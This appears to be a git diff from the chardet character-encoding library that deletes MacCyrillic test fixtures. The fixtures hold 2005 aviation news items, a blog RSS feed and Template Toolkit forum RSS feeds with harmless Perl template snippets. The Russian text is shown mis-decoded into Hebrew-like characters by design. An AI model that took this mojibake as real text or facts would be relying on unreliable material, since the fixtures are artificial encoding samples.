סאלמכועא-אלפטבטט ו-103.ו-103 ןמכףקטכ ךטעאיסךטי סונעטפטךאע עטןא VTC173A, קעמ ןמחגמכוע םאקאע ןמסעאגךט סאלמכועמג ןונגל חאךאחקטךאל ג טעאיסךמי אנמהםמי וסןףבכטךו.‘אלמכוע-אלפטבט ו-103 נאחנאבמעאם ג סממעגועסעגטט ס ענובמגאםטלט אגטאצטמםםץ ןנאגטכ €-23, FAR-23, JAR-23 ט טלווע נמססטיסךטי סונעטפטךאע עטןא םמנלאכםמי ךאעודמנטט. ‚ 2003 דמהף מם סונעטפטצטנמגאם ןמ םמנלאל ”והונאכםמי אגטאצטמםםמי אהלטםטסענאצטט ‘˜€, ג 2005 דמהף ןמכףקטכ סונעטפטךאע כועםמי דמהםמסעט ג נאחטכטט. ‚ םאסעמשוו גנול ןנמץמהע ןונודמגמנ מ ןמסעאגךאץ סאלמכועמג-אלפטבטי ט הנףדטל חאנףבוזםל חאךאחקטךאל. - - - - - "ˆכ‏רטם ”טםאםס" םאלונום ןנמהאע ג טעאי גמסול ˆכ-96-400 - http://www.aviaport.ru/news/2005/12/29/99252.html - ˆ” נאססקטעגאוע ןנמהאע מהםמי טח ךטעאיסךטץ אגטאךמלןאםטי גמסול דנףחמגץ ˆכ-96-400. אחמגא צוםא עאךמדמ סאלמכועא סמסעאגכוע מךמכמ $50 לכם. - Thu, 29 Dec 2005 14:41:00 +0300 - ‹טחטםדמגא ךמלןאםט "ˆכ‏רטם ”טםאםס" (ˆ”) נאססקטעגאוע ןנמהאע מהםמי טח ךטעאיסךטץ אגטאךמלןאםטי גמסול דנףחמגץ ˆכ-96-400, סךאחאכ Reuters דוםהטנוךעמנ €כוךסאםהנ ףבצמג.אחמגא צוםא עאךמדמ סאלמכועא סמסעאגכוע מךמכמ $50 לכם. ‚ ‎עמל דמהף נמססטיסךטו גכאסעט םא םוךמעמנמו גנול חאןנועטכט ‎ךסןכףאעאצט‏ ˆכ-96 טח-חא נהא הופוךעמג, גךכ‏קא עמנלמחםף‏ סטסעולף, םאןמלטםאוע Reuters."נמנאבאעגאועס סהוכךא םא ןמסעאגךף ˆכ-96-400 ג טעאי. …סע מהטם חאךאחקטך", - סךאחאכ מם, םו םאחגאג ךמלןאםט‏. ףבצמג המבאגטכ, קעמ ˆ” נאססקטעגאוע םא ןמעוםצטאכםץ ןמךףןאעוכוי ג ˆנאםו ט ‘טנטט, םמ םו ןנטגוכ ןמהנמבםמסעט.מלןאםט "ˆכ‏רטם ”טםאםס מ." (ˆ”) בכא סמחהאםא ג 1999 דמהף ןמ טםטצטאעטגו €גטאצטמםםמדמ ךמלןכוךסא ‘. ‚. ˆכ‏רטםא. סםמגםמי גטה הועוכםמסעט ˆ” - פטםאםסמגי ט מןונאצטמםםי כטחטםד אגטאצטמםםמי עוץםטךט נמססטיסךמדמ ןנמטחגמהסעגא. מלןאםט חאגטכא מ סובו ךאך מ סענאעודטקוסךמל טםגוסעמנו םאטבמכוו ךמםךףנוםעמסןמסמבםץ ןנוהןנטעטי מענאסכט. ‚ םאסעמשוו גנול חאםטלאוע ןנמקםו ןמחטצטט ג מענאסכט ךאך מהםמ טח גוהףשטץ סןוצטאכטחטנמגאםםץ אגטאכטחטםדמגץ ןנוהןנטעטי מססטט, כטהטנף‏שוו ןמ מבתולף סמבסעגוםםמדמ ךאןטעאכא ט גוכטקטםו ןמנעפוכ חאךאחמג. ‘ למלוםעא סגמודמ מבנאחמגאםט ˆ” ספמנלטנמגאכא ןאךוע חאךאחמג םא ךנףןםוירטץ אגטאסענמטעוכםץ חאגמהאץ מססטט, בכאדמהאנ ךמעמנל בכמ ןמסענמוםמ 8 םמגץ האכםולאדטסענאכםץ סאלמכועמג סולויסעגא ˆכ-96 םא ‚מנמםוזסךמל אךצטמםונםמל סאלמכועמסענמטעוכםמל מבתוהטםוםטט (‚€‘) ט 5 סאלמכועמג סולויסעגא ’ף-204 םא € "€גטאסעאנ" (“כםמגסך). ‚ םאסעמשטי למלוםע ˆ” פמנלטנףוע ןאךוע סעאנעמגמדמ חאךאחא נמססטיסךמ-ףךנאטםסךטץ סאלמכועמג סולויסעגא €ם-148, סונטיםמו ןנמטחגמהסעגמ ךמעמנץ ג 2005 דמהף םאכאזוםמ םא ‚€‘ ט טƒ€‡ "€גטאםע" (טוג). מ סמסעמםט‏ םא 1 מךעבנ 2005 דמהא סעמטלמסע אךעטגמג ˆ” מצוםטגאועס ג 12,386 לכנה נףבכוי ($427 לכם). מלןאםט ךמםענמכטנףועס דמסףהאנסעגמל (38% אךצטי ף מסטלףשוסעגא ט מךמכמ 16% - ג סמבסעגוםםמסעט דמסףהאנסעגוםםמדמ ‚םור‎ךמםמלבאםךא). …שו 36% נאסןמנזאועס אצטמםאכםא נוחונגםא ךמנןמנאצט, לוםוהזלוםע ךמםענמכטנףוע 7% אךצטי. - - - - - •אנךמגסךמו אגטאסענמטעוכםמו ןנוהןנטעטו דמעמגמ ףכאהטע ךמםפכטךע ס €’ "€םעמםמג" - http://www.aviaport.ru/news/2005/12/29/99251.html - •ƒ€ דמעמגמ ןנוהכמזטע €’ "€םעמםמג" לטנמגף‏. ב ‎עמל ךמננוסןמםהוםעף ‹§ƒ€´חםוס§םפמנל ג ‎ךסךכ‏חטגםמל טםעונג‏ סממבשטכ הטנוךעמנ ןנוהסעאגטעוכסעגא •ƒ€ ג טוגו „. וכםטך - Thu, 29 Dec 2005 14:35:00 +0300 - •אנךמגסךמו דמסףהאנסעגוםםמו אגטאצטמםםמו ןנמטחגמהסעגוםםמו ןנוהןנטעטו (•ƒ€) דמעמגמ ןנוהכמזטע €’ "€םעמםמג" לטנמגף‏. ב ‎עמל ךמננוסןמםהוםעף ‹§ƒ€´חםוס§םפמנל ג ‎ךסךכ‏חטגםמל טםעונג‏ סממבשטכ הטנוךעמנ ןנוהסעאגטעוכסעגא •ƒ€ ג טוגו „לטענטי וכםטך.מ ודמ סכמגאל, טחםאקאכםמ ג סףה ןמהאכ €’ "€םעמםמג" ס טסךמל םא גמחלושוםטו למנאכםמדמ ףשונבא ג נאחלונו 90 לכם.דנם. "‘ ‎עמדמ למלוםעא םאקאכטס ןנמצוסס, טסךט, אנבטענאזםו סףה... א סודמהםרםטי למלוםע •אנךמגסךטי אגטאחאגמה דמעמג סוסע חא סעמכ ןונודמגמנמג ט ןנוהכמזטע לטנמגף‏", - מעלועטכ „.וכםטך.‚ עמ זו גנול מם מעלועטכ, קעמ םולםמדמ נאםוו "לטנמגמו סמדכארוםטו" לוזהף ןנוהןנטעטלט בכמ המסעטדםףעמ, םמ ןמסכו "לטנמגמי" €’ ןמהאכ םא •ƒ€ מקונוהםמי טסך. "’אךטל מבנאחמל ךמללוםעטנמגאע ‎עמ סמבעטו לםו המגמכםמ חאענףהםטעוכםמ - סןנמסטעו ף םטץ. —עמ זו ךאסאועס ןמחטצטט •אנךמגסךמדמ אגטאחאגמהא.... …סכט םאל גהגטדא‏ע טסךט, ס ךמעמנלט ל םו סמדכאסם, עמ ל גהגטדאול גסענוקםו טסךט", - סממבשטכ „.וכםטך.אןמלםטל, סףהובםו נאחבטנאעוכסעגא לוזהף €’ ט •ƒ€ הכעס ףזו במכוו ןמכףדמהא. מסכוהםטל נורוםטול ןמ האםםמלף גמןנמסף גכועס נורוםטו טוגסךמדמ אןוככצטמםםמדמ ץמחיסעגוםםמדמ סףהא, ךמעמני 9 הוךאבנ 2005 דמהא מסעאגטכ בוח ףהמגכועגמנוםט אןוככצטמםםף‏ זאכמבף €’ "€םעמםמג" םא נורוםטו •מחיסעגוםםמדמ סףהא דמנמהא טוגא מע 19 סוםעבנ 2005 דמהא, ךמעמנל ךמלןאםטט בכמ מעךאחאםמ ג ףהמגכועגמנוםטט טסךא ך •ƒ€ םא סףללף 61,15 לכם. דנם. - - - - - ‘מענףהםטךט סכףזב אגטאצטמםםמי בוחמןאסםמסעט א‎נמןמנעא ’מכלאקוגמ טחתכט ף ךףנסאםעא לסךמדמ טםזוםונםמ-עאםךמגמדמ טםסעטעףעא לטםף - http://www.aviaport.ru/news/2005/12/29/99250.html - ‚ א‎נמןמנעף "’מכלאקוגמ" ןנט ןנמץמזהוםטט ןנוהןמכועםמדמ המסלמענא םא נויס מגמסטבטנסך - טנםי ף ןאססאזטנא מבםאנףזוםא לטםא - Thu, 29 Dec 2005 14:32:00 +0300 - 28 הוךאבנ ג 15.25 לוסעםמדמ גנולוםט ךףנסאםע 3 ךףנסא €כוךסאםהנ „תךמג בכ חאהונזאם טםסןוךעמנמל סכףזב אגטאצטמםםמי בוחמןאסםמסעט ןנט ןנמץמזהוםטט ןנוהןמכועםמדמ המסלמענא םא נויס מגמסטבטנסך - טנםי.טםא מךאחאכאס ףקובםמי. ‘מענףהםטךאלט כטםויםמדמ מעהוכא לטכטצטט א‎נמןמנעא סמסעאגכום ןנמעמךמכ, לאךוע לטם טחתע, סעףהוםע מעןנאגכום ןמ לוסעף זטעוכסעגא ג ןמסוכמך וכוהףי נוסןףבכטךט ‘אץא.מ סכמגאל, חאהונזאםםמדמ, לאךוע לטם מסעאכס ף םודמ ג סףלךו ןמסכו ףקוםטי. € מעבג ג מעןףסך מם ןנמסעמ םו ןנמגונטכ סמהונזטלמו סףלךט.P.S. וסלמענ םא מקום לאכוםךטו נאחלונ (לועאככטקוסךא קאסע ןנוהסעאגכוע סמבמי ןמכף‏ ענףבךף הטאלוענמל גסודמ 6 לל ט הכטםמי 2,5 סל.), לטםא בכא מבםאנףזוםא ג ןנמצוססו המסלמענא םא נוםעדוםמ-עוכוגטחטמםםמי ףסעאםמגךו "HEIMANN". - - - - - AZAL ןמכףקטע במכוו $8 לכם. סענאץמגץ גןכאע חא ןמעונןוגרטי ךנףרוםטו סאלמכוע €ם-140-100 - http://www.aviaport.ru/news/2005/12/29/99249.html - ‚ סממעגועסעגטט סמ סענאץמגל ןמכטסמל חא ןמעונןוגרטי ךאעאסענמפף בכטח אךף סאלמכוע €ם-140-100 ןנמטחגמהסעגא •ƒ€ AZAL ןמכףקטע $8,5 לכם. - Thu, 29 Dec 2005 14:20:00 +0300 - ‚ סממעגועסעגטט סמ סענאץמגל ןמכטסמל חא ןמעונןוגרטי ךאעאסענמפף בכטח אךף 23 הוךאבנ סאלמכוע €ם-140-100 ןנמטחגמהסעגא •אנךמגסךמדמ דמסףהאנסעגוםםמדמ אגטאצטמםםמדמ ןנוהןנטעט ƒ AZAL ןמכףקטע $8,5 לכם. ב ‎עמל, ךאך ןונוהאוע "’נוםה", סממבשטכ 28 הוךאבנ םא ןנוסס-ךמםפונוםצטט דכאגא ƒ AZAL „זאץאםדטנ €סךונמג.מ ודמ סכמגאל, ךאזהא סול ןמדטברטץ ןאססאזטנמג ןמכףקטע ןמ 115 לכם לאםאעמג, טכט $25 עס. "מלטלמ ‎עמדמ, ג סגחט ס ןמעונוי ךמנלטכצא, ג קאסעםמסעט, וסכט ף ןמדטברטץ ןאססאזטנמג בכט םוסמגונרוםםמכועםטו הועט, ל בףהוע טל גןכאקטגאע סנוהסעגא ג נאחלונו סנוהםוי חאנאבמעםמי ןכאע םא ךאזהמדמ נובוםךא",- סךאחאכ מם.„ז. €סךונמג מעלועטכ, קעמ גןכאע ךמלןוםסאצטי למדףע בע םאקאע ס פוגנאכ 2006 דמהא. ƒכאגא ƒ עאךזו מעלועטכ, קעמ ךאזהא סול קכוםמג ‎ךטןאזא ןמכףקטע $10 עס. ג ךאקוסעגו אגטאצטמםםמי סענאץמגךט. - - - - - diff --git a/chardet/tests/MacCyrillic/blog.mlmaster.com.xml b/chardet/tests/MacCyrillic/blog.mlmaster.com.xml deleted file mode 100644 index 64c0567..0000000 --- a/chardet/tests/MacCyrillic/blog.mlmaster.com.xml +++ /dev/null @@ -1,170 +0,0 @@ - - - - - - - chub@tosy - http://blog.mlmaster.com - love & peace ! - Wed, 28 Dec 2005 08:53:15 +0000 - http://wordpress.org/?v=1.5.2 - en - - - ‘ ƒ! - http://blog.mlmaster.com/?p=296 - http://blog.mlmaster.com/?p=296#comments - Wed, 28 Dec 2005 08:53:15 +0000 - danil - - General - http://blog.mlmaster.com/?p=296 - - http://blog.mlmaster.com/?feed=rss2&p=296 - - - מהדמעמגךא ך ‏בטכו‏ - http://blog.mlmaster.com/?p=295 - http://blog.mlmaster.com/?p=295#comments - Wed, 21 Dec 2005 19:43:43 +0000 - site admin - - General - http://blog.mlmaster.com/?p=295 - - http://blog.mlmaster.com/?feed=rss2&p=295 - - - ארט לטכו חאדנאםטקםו הנףח - http://blog.mlmaster.com/?p=294 - http://blog.mlmaster.com/?p=294#comments - Fri, 16 Dec 2005 09:19:20 +0000 - danil - - General - http://blog.mlmaster.com/?p=294 - - http://blog.mlmaster.com/?feed=rss2&p=294 - - - ‘כאגום, םףזםא סגח. - http://blog.mlmaster.com/?p=293 - http://blog.mlmaster.com/?p=293#comments - Wed, 14 Dec 2005 14:36:19 +0000 - RuAnShi - - General - http://blog.mlmaster.com/?p=293 - - http://blog.mlmaster.com/?feed=rss2&p=293 - - - € ךמלף פוסעטגאכוי - http://blog.mlmaster.com/?p=292 - http://blog.mlmaster.com/?p=292#comments - Tue, 06 Dec 2005 16:21:26 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=292 - - http://blog.mlmaster.com/?feed=rss2&p=292 - - - Exit the movie - http://blog.mlmaster.com/?p=291 - http://blog.mlmaster.com/?p=291#comments - Mon, 05 Dec 2005 18:01:09 +0000 - chubatos - - fun - http://blog.mlmaster.com/?p=291 - - http://blog.mlmaster.com/?feed=rss2&p=291 - - - טרעך - http://blog.mlmaster.com/?p=289 - http://blog.mlmaster.com/?p=289#comments - Mon, 05 Dec 2005 14:37:11 +0000 - danil - - General - http://blog.mlmaster.com/?p=289 - - http://blog.mlmaster.com/?feed=rss2&p=289 - - - €כטסא - http://blog.mlmaster.com/?p=288 - http://blog.mlmaster.com/?p=288#comments - Tue, 29 Nov 2005 08:58:22 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=288 - - http://blog.mlmaster.com/?feed=rss2&p=288 - - - ‚וכמלאנאפמם - http://blog.mlmaster.com/?p=287 - http://blog.mlmaster.com/?p=287#comments - Tue, 29 Nov 2005 08:55:52 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=287 - - http://blog.mlmaster.com/?feed=rss2&p=287 - - - מכוסא - http://blog.mlmaster.com/?p=286 - http://blog.mlmaster.com/?p=286#comments - Tue, 29 Nov 2005 08:52:59 +0000 - chubatos - - fun - http://blog.mlmaster.com/?p=286 - - http://blog.mlmaster.com/?feed=rss2&p=286 - - - diff --git a/chardet/tests/MacCyrillic/forum.template-toolkit.ru.4.xml b/chardet/tests/MacCyrillic/forum.template-toolkit.ru.4.xml deleted file mode 100644 index 46113d5..0000000 --- a/chardet/tests/MacCyrillic/forum.template-toolkit.ru.4.xml +++ /dev/null @@ -1,130 +0,0 @@ - - - - - ”מנףל Template Toolkit : בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_forum/forum_id-4.html?rss - Template Toolkit - בסענא, למשםא ט נאסרטנולא סטסעולא מבנאבמעךט ראבכמםמג. א סאיעו נאבמעאוע פמנףל, ג ךמעמנמל מבסףזהא‏עס גמןנמס טסןמכחמגאםט בטבכטמעוךט ןמ נאבמעו ס ראבכמםאלט. נוהכמזוםט ןמ נאבמעו פמנףלא. נדאםטחאצט םמגץ ךאעודמנטי ט פמנףלמג. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Tue, 3 Jan 2006 08:27:57 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ראבכמם ג perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - Tue, 3 Jan 2006 08:27:57 GMT - ‘ מגל ƒמהמל - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - מחהנאגכ‏ גסוץ ןמסועטעוכוי ‎עמדמ םובמכרמדמ, םמ םאהו‏ס ןמכוחםמדמ, סאיעא ס םאסעףןטגרטל 2006 דמהמל! †וכא‏ םמגץ עגמנקוסךטץ ףהאק ט םאץמהמך. - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-123.html - בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - Thu, 20 Jan 2005 12:10:22 GMT - XUL מבכמזךא - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - „כ ןמכחמגאעוכוי בנמףחונמג Mozilla סהוכאכ <a target="_blank" href="http://template-toolkit.ru/xul/index.xul">XUL מבכמזךף</a>. - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-57.html - בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - Wed, 15 Dec 2004 08:44:32 GMT - ו ןנטץמהטע ךמה הכ חאגונרוםט נודטסענאצטט - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - ‡הנאגסעגףיעו!<br /> -<br /> -םו םו ןנטץמהטע ךמה הכ חאגונרוםט נודטסענאצטט :(. ודטסענטנמגאכס 2 נאחא ס נאחםלט ןמקע. אהנוסאלט, םמ ‎פפוךע םףכוגמי :(. - - טךמכאי ‚. <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-44.html - בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - Sat, 4 Dec 2004 22:08:26 GMT - RDF סכףזבא חאדמכמגךמג - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - א פמנףלו המבאגכוםא <span style="font-weight:bold">RDF סכףזבא חאדמכמגךמג</span>. עא סכףזבא דמעמגטע פאיכ ס חאדמכמגךאלט םמגץ עול, מעךנעץ ג פמנףלאץ, ג פמנלאעו XML/RDF. ‘ ןמלמש‏ RDF סכףזב למזםמ מנדאםטחמגאע ןמהןטסךף םא םמגו עול, מעךנעו ג פמנףלאץ.<br /><br />‚ םאסעמשטי למלוםע המסעףןם סכוהף‏שטו ןמהןטסךט <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_1.rdf">‡םאךמלסעגמ ס Template Toolkit</a>, <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_6.rdf">מגמסעט Template Toolkit</a>, <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_4.rdf">בסףזהוםטו פמנףלא</a>.<br /><br />„כ מעסכוזטגאםט םמגץ עול ט קעוםט חאדמכמגךמג למזםמ טסןמכחמגאע סןוצטאכםו ןנמדנאלל ט סכףזב, םאןנטלונ: <a target="_blank" href="http://www.activerefresh.com/">Abilon</a>, <a target="_blank" href="http://www.feedreader.com/">FeedReader</a>, <a target="_blank" href="http://www.yole.ru/projects/syndirella/">Syndirella</a>, <a target="_blank" href="http://blogspace.com/rss/readers">RSS Readers</a>, <a target="_blank" href="http://www.watznew.com/">WatzNew</a>.<br /><br />מכחמגאעוכט בנמףחונא <span style="font-weight:bold"><span style="color: orange">Firefox</span></span> (גונסטט 0.8 ט סעאנרו) עאךזו למדףע םאסענמטע ןמהןטסךף קונוח <span style="font-weight:bold">Live Bookmark</span>. „כ ‎עמדמ םףזםמ חאיעט ג גבנאםםי פמנףל (םאןנטלונ, <a target="_blank" href="http://forum.template-toolkit.ru/view_forum/forum_id-6.html">מגמסעט Template Toolkit</a>). ‚ םטזםול ןנאגמל ףדכף בנמףחונא ןמגטעס חםאקמך <img src="http://forum.template-toolkit.ru/attachments/000/138/138/rdf.gif" alt="RDF" />. „מסעאעמקםמ שוכךםףע ןמ חםאקךף ט המבאגטע ןמהןטסךף ג חאךכאהךט. מסכו ‎עמדמ ג חאךכאהךאץ ןמגטעס ןאןךא &quot;מגמסעט Template Toolkit&quot;, ג ךמעמנמי ןונטמהטקוסךט בףהףע מבםמגכעס חאדמכמגךט םמגץ עול ג פמנףלו &quot;מגמסעט Template Toolkit&quot;. - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-40.html - בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - Wed, 21 Jul 2004 14:52:30 GMT - ןמהןטס [ƒמסע] - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - —עמ-עמ םו סמגסול ןמםעםמו עגמנטעס.<br /> -ום נאסןמחםאוע סטסעולא ךאך Light Elf, םמ למט סממבשוםט ןמלוקא‏עס םאהןטס‏ [ƒמסע].<br /> -<br /> -עמ עאך םאהמ? - - Light Elf <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-8.html - בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - Tue, 20 Jul 2004 15:02:45 GMT - נמבוכ ג סממבשוםטץ - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - …סע ןנוהכמזוםטו םו ףהאכע ןנמבוכ.<br /> -ס טץ ןמלמש‏ ףהמבםמ פמנלאעטנמגאע עוךסע.<br /> -סמבוםםמ ךמה. - - Light Elf <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-7.html - בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - Wed, 14 Jul 2004 06:13:38 GMT - „גטזמך פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - םו סמגסול ןמםכ. <br /> -לבכולךא סגונץף &quot;powered by [%TT2%]&quot; מחםאקאוע קעמ ‎עמע פמנףל סהוכאם םא TT2? - - UncleAndy <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-4.html - בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - Mon, 12 Jul 2004 04:25:44 GMT - ”מנףל מעךנע - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - 12 ט‏כ 2004 דמהא מעךנכטס <span style="font-weight:bold">פמנףל Template Toolkit</span>. נטדכארא‏ גסוץ טםעונוסף‏שטץס ט טסןמכחף‏שטץ ג נאבמעו בטבכטמעוךף Template Toolkit ך ףקאסעט‏.<br /><br />מט בכאדמהאנםמסעט:<br /><br />„לטענט‏ טךמכאוגף חא ןמההונזךף, נאססכךף קונוח ןמהןטסךף Subscribe.Ru סעאעט מ Template Toolkit, ןנוהמסעאגכוםטו פמנףלא <a target="_blank" href="http://perl.dp.ua/cgi-bin/forum.pl?do=show&tema=1&page=1">Perl - ‡אץמהט ט ףקטס</a> ג ךאקוסעגו פמנףלא ןמההונזךט סאיעא <a target="_blank" href="http://www.template-toolkit.ru/">Template Toolkit (נףססךא נוהאךצט)</a>.<br /><br />‚אהטלף ‘ףץאםמגף חא ןמההונזךף ט טהו‏ סמחהאםט ‎עטץ פמנףלמג.<br /><br />אהו‏ס, קעמ פמנףל סעאםףע ןמכוחםלט הכ עוץ, ךעמ טסןמכחףוע טכט סמבטנאועס טסןמכחמגאע ג סגמטץ נאחנאבמעךאץ בטבכטמעוךף ןמ נאבמעו ס ראבכמםאלט Template Toolkit. ‘ןנארטגאיעו, הוכטעוס, מבסףזהאיעו.<br /><br /><span style="font-weight:bold">‘ענףךעףנא פמנףלא ןנוהגאנטעוכםא</span>. דמעמג גסכףראע ט ףקוסע גסו ןנוהכמזוםט ןמ סמחהאםט‏ םמגץ גועמך ג נאלךאץ פמנףלמג Template Toolkit.<br /><br />‘אל פמנףל םאןטסאם ס טסןמכחמגאםטול Template Toolkit ט בףהוע המנאבאעגאעס. ‚סו חאלוקאםט ט ןנוהכמזוםט ןנטגועסעגף‏עס. - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-1.html - בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - - - diff --git a/chardet/tests/MacCyrillic/forum.template-toolkit.ru.6.xml b/chardet/tests/MacCyrillic/forum.template-toolkit.ru.6.xml deleted file mode 100644 index 8e7f0c6..0000000 --- a/chardet/tests/MacCyrillic/forum.template-toolkit.ru.6.xml +++ /dev/null @@ -1,486 +0,0 @@ - - - - - ”מנףל Template Toolkit : מגמסעט Template Toolkit - http://forum.template-toolkit.ru/view_forum/forum_id-6.html?rss - Template Toolkit - בסענא, למשםא ט נאסרטנולא סטסעולא מבנאבמעךט ראבכמםמג. א סאיעו נאבמעאוע פמנףל, ג ךמעמנמל מבסףזהא‏עס גמןנמס טסןמכחמגאםט בטבכטמעוךט ןמ נאבמעו ס ראבכמםאלט. €םמםס ט םמגמסעט, סגחאםםו ס Template Toolkit. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Mon, 26 Dec 2005 16:28:41 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ראבכמם ג perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - Mon, 19 Dec 2005 14:49:49 GMT - Template::Provider::FromDATA - חאדנףחךא ראבכמםמג טח סוךצטט __DATA__ - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - א CPAN מןףבכטךמגאםא גונסט 0.04 <a target="_blank" href="http://search.cpan.org/~bricas/Template-Provider-FromDATA/">למהףכ Template::Provider::FromDATA</a>, ךמעמני ןמחגמכוע ץנאםטע ראבכמם גלוסעו ס ךמהמל ג מהםמל פאיכו (סוךצט __DATA__).<br /><br />„כ טסןמכחמגאםט האםםמדמ למהףכ םומבץמהטלמ גםאקאכו סמחהאע ‎ךחולןכנ ןנמגאיהונא Template::Provider::FromDATA, א חאעול ףךאחאע ודמ ג ךאקוסעגו ןמסעאגשטךא ראבכמםמג ג ךמםסענףךעמנו Template:<br /><br /><div class="code"><pre>use Template; -use Template::Provider::FromDATA; - -# ‘מחהאל מבתוךע ןמסעאגשטךא -my $provider = Template::Provider::FromDATA-&gt;new( { - CLASSES =&gt; __PACKAGE__ -} ); - -# “ךאחגאול מבתוךע ןמסעאגשטךא ג מןצט ךמםסענףךעמנא Template -my $template = Template-&gt;new( { - # ... - LOAD_TEMPLATES =&gt; [ $provider ] -} ); - -# ...סאלט ראבכמם ג סוךצטט __DATA__ - -__DATA__ - -__mytemplate__ -Foo [% bar %] - -__myothertemplate__ -Baz, [% qux %]?</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-122.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - Mon, 19 Dec 2005 14:10:59 GMT - Template::Plugin::HTML::Strip - ףהאכוםטו HTML-עודמג טח עוךסעא - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - א CPAN מןףבכטךמגאםא גונסט 0.01 למהףכ <a target="_blank" href="http://search.cpan.org/~gsimmons/Template-Plugin-HTML-Strip/">למהףכ Template::Plugin::HTML::Strip</a>. מהףכ ןנוהמסעאגכוע ןכאדטם, ךמעמני ןמחגמכוע ףהאכע טח עוךסעא HTML-עודט.<br /><br /><div class="code"><pre>[% USE HTML.Strip %] - -[% FILTER html_strip %] -&lt;title&gt;People for the Preservation of Presentational Markup&lt;/title&gt; -&lt;h1&gt;HTML::Strip - A cause for concern?&lt;/h1&gt; -[% END %] - -[% USE HTML.Strip 'strip' - striptags = [ 'script' 'iframe' ] - emit_spaces = 0 -%] - -[% FILTER strip %] -&lt;p&gt;A call to arms against the removal of our elements!&lt;/p&gt; -[% END %]</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-121.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - Sun, 6 Nov 2005 08:46:17 GMT - Template::Plugin::Subst - חאלוםא עוךסעא ס ןמלמש‏ נודףכנםץ גנאזוםטי - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - א CPAN מןףבכטךמגאם <a target="_blank" href="http://search.cpan.org/~nikc/Template-Plugin-Subst/">למהףכ Template::Plugin::Subst</a>, ךמעמני ןמחגמכוע גןמכםע חאלום ג עוךסעו ס טסןמכחמגאםטול נודףכנםץ גנאזוםטי.<br /><br />ˆסןמכחמגאםטו גטנעףאכםמדמ לועמהא <span style="font-weight:bold">subst</span><br /><div class="code"><pre>[% USE Subst %] -[% str = 'רטכמ םא לכמ' %] -[% str.subst('(רטכמ|לכמ) םא (לכמ|רטכמ)', '$2 םא $1', 1) %]</pre></div><br /><br />ˆסןמכחמגאםטו פטכענא<br /><div class="code"><pre>[% USE filt = Subst - pattern = '(רטכמ|לכמ) םא 